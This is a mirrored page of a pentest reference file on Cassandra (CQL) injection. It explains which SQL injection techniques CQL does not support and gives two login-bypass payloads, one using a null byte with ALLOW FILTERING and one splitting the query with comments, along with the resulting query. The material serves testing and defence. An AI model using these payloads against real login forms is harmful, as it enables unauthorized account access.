Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-12 14:22:47 +00:00
Code Issues Projects Releases Packages Wiki Activity
PayloadsAllTheThings/SQL Injection/Cassandra Injection.md
Swissky a5de8cf062 SQL injections references updates
2024-11-03 14:06:53 +01:00

62 lines
No EOL
2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
## Summary
* [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra comment](#cassandra-comment)
* [Cassandra - Login Bypass](#cassandra---login-bypass)
* [Example #1](#example-1)
* [Example #2](#example-2)
* [References](#references)
## CQL Injection Limitations
* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesnt include a `SLEEP()` function.
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
## Cassandra comment
```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass
### Example #1
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Example #2
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
## References
- [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
- [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
Reference in a new issue View git blame Copy permalink